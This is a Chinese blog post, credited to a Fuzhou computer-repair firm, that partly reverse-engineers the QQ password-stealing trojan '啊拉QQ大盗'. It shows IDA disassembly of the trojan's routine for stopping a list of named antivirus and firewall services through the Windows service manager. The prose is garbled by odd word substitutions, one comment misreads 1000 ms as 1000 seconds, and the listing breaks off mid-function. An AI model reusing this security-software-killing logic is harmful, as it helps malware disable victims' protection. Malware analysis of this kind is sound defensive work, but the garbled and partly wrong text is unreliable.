不完全逆向分析啊拉QQ大盗
啊拉QQ暴徒有几个部分,各人看一下他的功效:
运转后封闭QQ,安置后删除自身,过滤反复号码,彻底坠毁防火墙等等.此中我最感兴趣的还是看看啊拉QQ暴徒是怎么坠毁防火墙的,故挑了重点对它举行逆向分析.这个服务端是加了个壳.我对脱壳呆子,所以叫冷血书生帮我脱了.空话少说,下面是反汇编代码:
Copy code
.shrink:0040A0AA mov eax, offset s_Rsccenter ; "RsCCenter"
.shrink:0040A0AF call sub_4095FC ;干掉如下防火墙服务..
.shrink:0040A0AF
.shrink:0040A0B4 mov eax, offset s_Kvsrvxp ; "KVSrvXP"
.shrink:0040A0B9 call sub_4095FC
.shrink:0040A0B9
.shrink:0040A0BE mov eax, offset s_Kavsvc ; "kavsvc"
.shrink:0040A0C3 call sub_4095FC
.shrink:0040A0C3
.shrink:0040A0C8 mov eax, offset s_Kpfwsvc ; "KPfwSvc"
.shrink:0040A0CD call sub_4095FC
.shrink:0040A0CD
.shrink:0040A0D2 mov eax, offset s_Kwatchsvc ; "KWatchSvc"
.shrink:0040A0D7 call sub_4095FC
.shrink:0040A0D7
.shrink:0040A0DC mov eax, offset s_Wscsvc ; "wscsvc"
.shrink:0040A0E1 call sub_4095FC
.shrink:0040A0E1
.shrink:0040A0E6 mov eax, offset s_Sndsrvc ; "SNDSrvc"
.shrink:0040A0EB call sub_4095FC
.shrink:0040A0EB
.shrink:0040A0F0 mov eax, offset s_Ccproxy ; "ccProxy"
.shrink:0040A0F5 call sub_4095FC
.shrink:0040A0F5
.shrink:0040A0FA mov eax, offset s_Ccevtmgr ; "ccEvtMgr"
.shrink:0040A0FF call sub_4095FC
.shrink:0040A0FF
.shrink:0040A104 mov eax, offset s_Ccsetmgr ; "ccSetMgr"
.shrink:0040A109 call sub_4095FC
.shrink:0040A109
.shrink:0040A10E mov eax, offset s_Spbbcsvc ; "SPBBCSvc"
.shrink:0040A113 call sub_4095FC
.shrink:0040A113
.shrink:0040A118 mov eax, offset s_SymantecCoreL ; "Symantec Core LC"
.shrink:0040A11D call sub_4095FC
.shrink:0040A11D
.shrink:0040A122 mov eax, offset s_Navapsvc ; "navapsvc"
.shrink:0040A127 call sub_4095FC
.shrink:0040A127
.shrink:0040A12C mov eax, offset s_Npfmntor ; "NPFMntor"
.shrink:0040A131 call sub_4095FC
.shrink:0040A131
.shrink:0040A136 mov eax, offset s_Mskservice ; "MskService"
.shrink:0040A13B call sub_4095FC
.shrink:0040A13B
.shrink:0040A140 mov eax, offset s_Mctaskmanager ; "McTaskManager"
.shrink:0040A145 call sub_4095FC
.shrink:0040A145
.shrink:0040A14A mov eax, offset s_Mcshield ; "McShield"
.shrink:0040A14F call sub_4095FC
.shrink:0040A14F
.shrink:0040A154 mov eax, offset s_Mcafeeframewo ; "McAfeeFramework"
.shrink:0040A159 call sub_4095FC
.shrink:0040A159
.shrink:0040A15E
.shrink:0040A15E loc_40A15E: ; CODE XREF: .shrink:0040A16D j
.shrink:0040A15E call sub_409064
.shrink:0040A15E
.shrink:0040A163 push 0BB8h
.shrink:0040A168 call Sleep ;休眠
.shrink:0040A168
.shrink:0040A16D jmp short loc_40A15E
.shrink:0040A16D
很明显,通过一个参数通报给sub_4095FC这个分支,而这个参数正好是一些罕见的杀毒软件服务称号.所以这个函数应该这样布局:char sub_4095FC(int buffer)(C言语语法)把这个称号通报给sub_4095FC干什么捏?各人请看sub_4095FC这个分支:
Copy code
.shrink:004095FC sub_4095FC proc near
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC
.shrink:004095FC var_4 = dword ptr -4 ;通报进来的参数
.shrink:004095FC
.shrink:004095FC push ebp
.shrink:004095FD mov ebp, esp
.shrink:004095FF push ecx
.shrink:00409600 push ebx
.shrink:00409601 push esi
.shrink:00409602 push edi
.shrink:00409603 mov [ebp+var_4], eax
.shrink:00409606 mov eax, [ebp+var_4]
.shrink:00409609 call sub_403ED0
.shrink:00409609
.shrink:0040960E xor eax, eax
.shrink:00409610 push ebp
.shrink:00409611 push offset s_SUIL_YN@ ; "榕瀄xFF\xFF腽嬅_^[Y]脥@" (这里已经被加密)
.shrink:00409616 push dword ptr fs:[eax]
.shrink:00409619 mov fs:[eax], esp
.shrink:0040961C mov eax, [ebp+var_4]
.shrink:0040961F call sub_403EE0
.shrink:0040961F
.shrink:00409624 mov esi, eax
.shrink:00409626 push 0F003Fh ; dwDesiredAccess
.shrink:0040962B push 0 ; lpDatabaseName
.shrink:0040962D push 0 ; lpMachineName
.shrink:0040962F call OpenSCManagerA ; 翻开服务办理器
.shrink:0040962F
.shrink:00409634 mov edi, eax ; 生存句柄到edi
.shrink:00409636 test edi, edi ; 是否翻开成功?
.shrink:00409638 jbe short loc_4096A8 ; 翻开成功,连续实行,反之跳到这里
.shrink:00409638
.shrink:0040963A push 0F01FFh ; dwDesiredAccess
.shrink:0040963F push esi ; lpServiceName
.shrink:00409640 push edi ; hSCManager
.shrink:00409641 call OpenServiceA ; 翻开一个防火墙的服务
.shrink:00409641
.shrink:00409646 mov esi, eax
.shrink:00409648 test esi, esi
.shrink:0040964A jbe short loc_4096A2 ; 翻开堕落 封闭句柄
.shrink:0040964A
.shrink:0040964C push offset ServiceStatus ; lpServiceStatus
.shrink:00409651 push 1 ; dwControl
.shrink:00409653 push esi ; hService
.shrink:00409654 call ControlService ; 制止人家的防火墙的服务
.shrink:00409654
.shrink:00409659 test eax, eax
.shrink:0040965B jz short loc_4096A8
.shrink:0040965B
.shrink:0040965D push 3E8h ; dwMilliseconds
.shrink:00409662 call Sleep ; 休眠1000秒
.shrink:00409662
.shrink:00409667 jmp short loc_40967C
.shrink:00409667
.shrink:00409669 ; ---------------------------------------------------------------------------
.shrink:00409669
.shrink:00409669 loc_409669:
.shrink:00409669 cmp ServiceStatus.dwCurrentState,3 ;是否是SERVICE_STOP_PENDING形态
.shrink:00409670 jnz short loc_40968B
.shrink:00409670
.shrink:00409672 push 3E8h ; dwMilliseconds
.shrink:00409677 call Sleep ;休眠
.shrink:00409677
.shrink:0040967C
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
